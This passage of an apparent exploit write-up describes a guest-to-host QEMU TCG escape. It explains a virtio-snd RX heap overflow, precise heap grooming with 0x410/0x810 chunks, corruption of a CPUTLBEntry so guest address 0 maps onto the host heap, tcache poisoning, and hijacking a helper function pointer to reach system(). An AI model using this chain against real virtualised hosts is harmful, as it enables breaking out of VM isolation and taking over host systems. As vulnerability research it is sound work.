(0x8000000 >> 12) & 0x3f = 0

That lets the exploit first create a legitimate entry for 0x8000000, then corrupt only the compare fields so the same entry also appears valid for guest address 0.

Before corruption, entry 0 looks like:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read  = 0x8000000 | flags    |
| addr_write = 0x8000000 | flags    |
| addr_code  = ...                  |
| addend     = host_ptr - 0x8000000 |
+-----------------------------------+

After the virtio-snd overflow writes into the first 0x10 bytes:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read  = 0                    |
| addr_write = 0                    |
| addr_code  = ...                  |
| addend     = host_ptr - 0x8000000 |
+-----------------------------------+

Now a guest load from virtual address 0 can pass the fast-path compare, but the preserved addend still points at the host location derived from the old 0x8000000 translation:

host = 0 + (host_ptr - 0x8000000)

For us that lands inside QEMU’s host heap.

Primitives

A QEMU TLB flush invalidates entries in this software cache. For a full flush of one MMU index, QEMU clears the entry table and resets accounting:


2 collapsed lines
1
static void tlb_mmu_flush_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast)
2
{
3
    desc->n_used_entries = 0;
4
    desc->large_page_addr = -1;
5
    desc->large_page_mask = -1;
6
    desc->vindex = 0;
7
    memset(fast->table, -1, sizeof_tlb(fast));
2 collapsed lines
8
    memset(desc->vtable, -1, sizeof(desc->vtable));
9
}

For a single-page flush, QEMU normally invalidates one table entry. But QEMU also tracks large-page translations. If the flushed page belongs to a tracked large page, tlb_flush_page_locked() escalates to a full flush for that MMU index:


5 collapsed lines
1
static void tlb_flush_page_locked(CPUState *cpu, int midx, vaddr page)
2
{
3
    vaddr lp_addr = cpu->neg.tlb.d[midx].large_page_addr;
4
    vaddr lp_mask = cpu->neg.tlb.d[midx].large_page_mask;
5

6
    /* Check if we need to flush due to large pages.  */
7
    if ((page & lp_mask) == lp_addr) {
8
        tlb_flush_one_mmuidx_locked(cpu, midx, get_clock_realtime());
9
    } else {
10
        if (tlb_flush_entry_locked(tlb_entry(cpu, midx, page), page)) {
11
            tlb_n_used_entries_dec(cpu, midx);
12
        }
13
        tlb_flush_vtlb_page_locked(cpu, midx, page);
14
    }
15
}

We can use this to, for example, flip a mapped guest region to PROT_NONE and back to PROT_READ | PROT_WRITE. Inside the guest, that makes the kernel update page tables and flush stale guest translations. In TCG, those guest invalidations cause QEMU to throw away affected software TLB entries.

Then with our inserted invlpg primitive, we can install HUGE_VADDR as a 2 MiB mapping. The i386 TCG helper for invlpg reaches:

1
void helper_flush_page(CPUX86State *env, target_ulong addr)
2
{
3
    tlb_flush_page(env_cpu(env), addr);
4
}

Because HUGE_VADDR is a large mapping, QEMU’s large-page tracking can turn that single-page invalidation into the full-MMU-index flush path and the resize logic is tied to full-table flushing.

The TCG TLB tables are dynamic. QEMU tracks how many entries were used in a short time window. When a flush happens, tlb_mmu_resize_locked() may grow or shrink the table based on that recent usage rate.

The important part for exploitation is that a resize is a normal heap free and allocation:


15 collapsed lines
1
static void tlb_mmu_resize_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast,
2
                                  int64_t now)
3
{
4
    size_t old_size = tlb_n_entries(fast);
5
    size_t rate;
6
    size_t new_size = old_size;
7
    int64_t window_len_ms = 100;
8
    int64_t window_len_ns = window_len_ms * 1000 * 1000;
9
    bool window_expired = now > desc->window_begin_ns + window_len_ns;
10

11
    if (desc->n_used_entries > desc->window_max_entries) {
12
        desc->window_max_entries = desc->n_used_entries;
13
    }
14
    rate = desc->window_max_entries * 100 / old_size;
15

16
    if (rate > 70) {
17
        new_size = MIN(old_size << 1, 1 << CPU_TLB_DYN_MAX_BITS);
18
    } else if (rate < 30 && window_expired) {
19
        size_t ceil = pow2ceil(desc->window_max_entries);
20
        size_t expected_rate = desc->window_max_entries * 100 / ceil;
21

13 collapsed lines
22
        /*
23
         * Avoid undersizing when the max number of entries seen is just below
24
         * a pow2. For instance, if max_entries == 1025, the expected use rate
25
         * would be 1025/2048==50%. However, if max_entries == 1023, we'd get
26
         * 1023/1024==99.9% use rate, so we'd likely end up doubling the size
27
         * later. Thus, make sure that the expected use rate remains below 70%.
28
         * (and since we double the size, that means the lowest rate we'd
29
         * expect to get is 35%, which is still in the 30-70% range where
30
         * we consider that the size is appropriate.)
31
         */
32
        if (expected_rate > 70) {
33
            ceil *= 2;
34
        }
35
        new_size = MAX(ceil, 1 << CPU_TLB_DYN_MIN_BITS);
36
    }
37

38
    if (new_size == old_size) {
39
        if (window_expired) {
40
            tlb_window_reset(desc, now, desc->n_used_entries);
41
        }
42
        return;
43
    }
44

45
    g_free(fast->table);
46
    g_free(desc->fulltlb);
47

48
    tlb_window_reset(desc, now, 0);
49
    /* desc->n_used_entries is cleared by the caller */
50
    fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;
51
    fast->table = g_try_new(CPUTLBEntry, new_size);
52
    desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);
53

54
    /*
19 collapsed lines
55
     * If the allocations fail, try smaller sizes. We just freed some
56
     * memory, so going back to half of new_size has a good chance of working.
57
     * Increased memory pressure elsewhere in the system might cause the
58
     * allocations to fail though, so we progressively reduce the allocation
59
     * size, aborting if we cannot even allocate the smallest TLB we support.
60
     */
61
    while (fast->table == NULL || desc->fulltlb == NULL) {
62
        if (new_size == (1 << CPU_TLB_DYN_MIN_BITS)) {
63
            error_report("%s: %s", __func__, strerror(errno));
64
            abort();
65
        }
66
        new_size = MAX(new_size >> 1, 1 << CPU_TLB_DYN_MIN_BITS);
67
        fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;
68

69
        g_free(fast->table);
70
        g_free(desc->fulltlb);
71
        fast->table = g_try_new(CPUTLBEntry, new_size);
72
        desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);
73
    }
74
}

So by touching many guest pages, we can make the table grow. This raises desc->n_used_entries and therefore window_max_entries; once the used-entry rate crosses 70%, QEMU doubles the table. Later, after the target 0x810 RX hole has been freed, we do the opposite: touch only one or a few pages, trigger a flush, wait for the 100 ms resize window to expire, and trigger another flush. At that point window_max_entries is tiny relative to the old table, so rate < 30 and QEMU shrinks to MAX(pow2ceil(window_max_entries), 1 << CPU_TLB_DYN_MIN_BITS). With one useful entry, that is the minimum fast table: 64 entries.

64 * sizeof(CPUTLBEntry)
64 * 0x20 = 0x800-byte allocation
glibc chunk size = 0x810

First of all a note on our virtio-snd primitives, we have:

1
/*
2
 * VirtIOSoundPCMBuffer has a dynamic size since it includes the raw PCM data
3
 * in its allocation. It must be initialized and destroyed as follows:
4
 *
5
 *   size_t size = [[derived from owned VQ element descriptor sizes]];
6
 *   buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
7
 *   buffer->elem = [[owned VQ element]];
8
 *
9
 *   [..]
10
 *
11
 *   g_free(buffer->elem);
12
 *   g_free(buffer);
13
 */
14
struct VirtIOSoundPCMBuffer {
15
    QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;
16
    VirtQueueElement *elem;
17
    VirtQueue *vq;
18
    size_t size;
19
    /*
20
     * In TX / Playback, `offset` represents the first unused position inside
21
     * `data`. If `offset == size` then there are no unused data left.
22
     */
23
    uint64_t offset;
24
    /* Used for the TX queue for lazy I/O copy from `elem` */
25
    bool populated;
26
    /*
27
     * VirtIOSoundPCMBuffer is an unsized type because it ends with an array of
28
     * bytes. The size of `data` is determined from the I/O message's read-only
29
     * or write-only size when allocating VirtIOSoundPCMBuffer.
30
     */
31
    uint8_t data[];
32
};

On the target build, data[] starts at offset 0x29, and sizeof(VirtIOSoundPCMBuffer) rounds to 0x30.

We have two ways to allocate within the driver:

1
/*
2
 * The rx virtqueue handler. Makes the buffers available to their respective
3
 * streams for consumption.
4
 *
5
 * @vdev: VirtIOSound device
6
 * @vq: rx virtqueue
7
 */
8
static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)
9
{
44 collapsed lines
10
    VirtIOSound *vsnd = VIRTIO_SND(vdev);
11
    VirtIOSoundPCMBuffer *buffer;
12
    VirtQueueElement *elem;
13
    size_t msg_sz, size;
14
    virtio_snd_pcm_xfer hdr;
15
    uint32_t stream_id;
16
    /*
17
     * if any of the I/O messages are invalid, put them in vsnd->invalid and
18
     * return them after the for loop.
19
     */
20
    bool must_empty_invalid_queue = false;
21

22
    if (!virtio_queue_ready(vq)) {
23
        return;
24
    }
25
    trace_virtio_snd_handle_rx_xfer();
26

27
    for (;;) {
28
        VirtIOSoundPCMStream *stream;
29

30
        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
31
        if (!elem) {
32
            break;
33
        }
34
        /* get the message hdr object */
35
        msg_sz = iov_to_buf(elem->out_sg,
36
                            elem->out_num,
37
                            0,
38
                            &hdr,
39
                            sizeof(virtio_snd_pcm_xfer));
40
        if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
41
            goto rx_err;
42
        }
43
        stream_id = le32_to_cpu(hdr.stream_id);
44

45
        if (stream_id >= vsnd->snd_conf.streams
46
            || !vsnd->pcm.streams[stream_id]) {
47
            goto rx_err;
48
        }
49

50
        stream = vsnd->pcm.streams[stream_id];
51
        if (stream == NULL || stream->info.direction != VIRTIO_SND_D_INPUT) {
52
            goto rx_err;
53
        }
54
        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
55
            size = iov_size(elem->in_sg, elem->in_num) -
56
                sizeof(virtio_snd_pcm_status);
57
            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
58
            buffer->elem = elem;
59
            buffer->vq = vq;
60
            buffer->size = 0;
61
            buffer->offset = 0;
62
            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
63
        }
64
        continue;
65

11 collapsed lines
66
rx_err:
67
        must_empty_invalid_queue = true;
68
        buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
69
        buffer->elem = elem;
70
        buffer->vq = vq;
71
        QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
72
    }
73

74
    if (must_empty_invalid_queue) {
75
        empty_invalid_queue(vdev, vq);
76
    }
77
}

With size 0x30 + (in_len - 0x8) = in_len + 0x28, and:

1
/*
2
 * The tx virtqueue handler. Makes the buffers available to their respective
3
 * streams for consumption.
4
 *
5
 * @vdev: VirtIOSound device
6
 * @vq: tx virtqueue
7
 */
8
static void virtio_snd_handle_tx_xfer(VirtIODevice *vdev, VirtQueue *vq)
9
{
48 collapsed lines
10
    VirtIOSound *vsnd = VIRTIO_SND(vdev);
11
    VirtIOSoundPCMBuffer *buffer;
12
    VirtQueueElement *elem;
13
    size_t msg_sz, size;
14
    virtio_snd_pcm_xfer hdr;
15
    uint32_t stream_id;
16
    /*
17
     * If any of the I/O messages are invalid, put them in vsnd->invalid and
18
     * return them after the for loop.
19
     */
20
    bool must_empty_invalid_queue = false;
21

22
    if (!virtio_queue_ready(vq)) {
23
        return;
24
    }
25
    trace_virtio_snd_handle_tx_xfer();
26

27
    for (;;) {
28
        VirtIOSoundPCMStream *stream;
29

30
        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
31
        if (!elem) {
32
            break;
33
        }
34
        /* get the message hdr object */
35
        msg_sz = iov_to_buf(elem->out_sg,
36
                            elem->out_num,
37
                            0,
38
                            &hdr,
39
                            sizeof(virtio_snd_pcm_xfer));
40
        if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
41
            goto tx_err;
42
        }
43
        stream_id = le32_to_cpu(hdr.stream_id);
44

45
        if (stream_id >= vsnd->snd_conf.streams
46
            || vsnd->pcm.streams[stream_id] == NULL) {
47
            goto tx_err;
48
        }
49

50
        stream = vsnd->pcm.streams[stream_id];
51
        if (stream->info.direction != VIRTIO_SND_D_OUTPUT) {
52
            goto tx_err;
53
        }
54

55
        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
56
            size = iov_size(elem->out_sg, elem->out_num) - msg_sz;
57

58
            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
59
            buffer->elem = elem;
60
            buffer->populated = false;
61
            buffer->vq = vq;
62
            buffer->size = size;
63
            buffer->offset = 0;
64
            stream->latency_bytes += size;
16 collapsed lines
65

66
            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
67
        }
68
        continue;
69

70
tx_err:
71
        must_empty_invalid_queue = true;
72
        buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
73
        buffer->elem = elem;
74
        buffer->vq = vq;
75
        QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
76
    }
77

78
    if (must_empty_invalid_queue) {
79
        empty_invalid_queue(vdev, vq);
80
    }
81
}

With size 0x30 + data_len

The important size is 0x410, since it makes the RX overflow land exactly on the fields we want in the next allocation. The vulnerable source is an RX buffer with in_len = 0x3d8:

RX data size = in_len - sizeof(virtio_snd_pcm_status)
             = 0x3d8 - 0x8
             = 0x3d0

QEMU request = sizeof(VirtIOSoundPCMBuffer) + 0x3d0
             = 0x30 + 0x3d0
             = 0x400

glibc chunk  = request2size(0x400)
             = 0x410

The source stream’s period_bytes is 0x3f7, while buffer->data starts at offset 0x29. So the buggy audio write reaches:

0x29 + 0x3f7 = 0x420 bytes from the source user pointer

The next chunk’s user pointer starts at 0x410, so the overflow reaches:

0x420 - 0x410 = 0x10 bytes into the next allocation

That is exactly two qwords: CPUTLBEntry.addr_read and CPUTLBEntry.addr_write, and we can reuse the 0x410 for the tcache. It’s also the last default small tcache size:

idx = (0x410 - 0x20) / 0x10 = 0x3f

So we can reuse that for the a/b write as well.

Exploit

Combining this (and a bit of heap grooming), we can achieve something like:

Spray some 0x810 chunks with live virtio-snd TX filler buffers (fill810, TX_HOLE_FILLER_DATA_LEN = 0x7d0).
Spray some 0x410 chunks with live virtio-snd TX guard buffers (guard410, TX_SMALL_FILLER_DATA_LEN = 0x3d0).
Grow the user-mode TLB table. The idea is to shrink the TLB table later so it occupies a 0x810 chunk.
Queue RX source/target pairs. [source RX buffer: 0x410 live] [target RX buffer: 0x810]
Free only the target-side 0x810 chunk(s). This is possible because the different streams let us free only this target. [source RX buffer: 0x410 live] [target 0x810 chunk: free]
Shrink the TCG TLB so CPUTLBEntry[64] reclaims a freed 0x810 target hole. [source RX buffer: 0x410 live] [0x810 chunk: TLB table]
Overflow from the live 0x410 source into CPUTLBEntry[0].
Use guest NULL as a host heap page window.

We can probe this a bit by capturing segfaults from the guest to see if it succeeded. Also, this first page immediately gives us a text and TCG code-cache rwx leak.
Edit tcache metadata in that page.

For arbitrary write, we need a bit more, so we find the tcache_perthread_struct, which is in this page, write a pointer into tcache->entries[0x3f], and use the 0x410 allocation.
Use TX allocations as targeted host writes.
Write an RWX system stub and overwrite helper_info_fninit.func.
Guest executes FNINIT1 -> helper_info_fninit.func -> rwx region -> system.

We can actually stabilize this all a bit by using i.e. multiple targets, so multiple holes where the TLB table might get allocated.

Escape V2

Coming soon.

Components

Bug

Exploit

Footnotes

Bug

Exploit

Aftermath

Intended Exploit

TLB / Target

Primitives

Exploit

Escape V2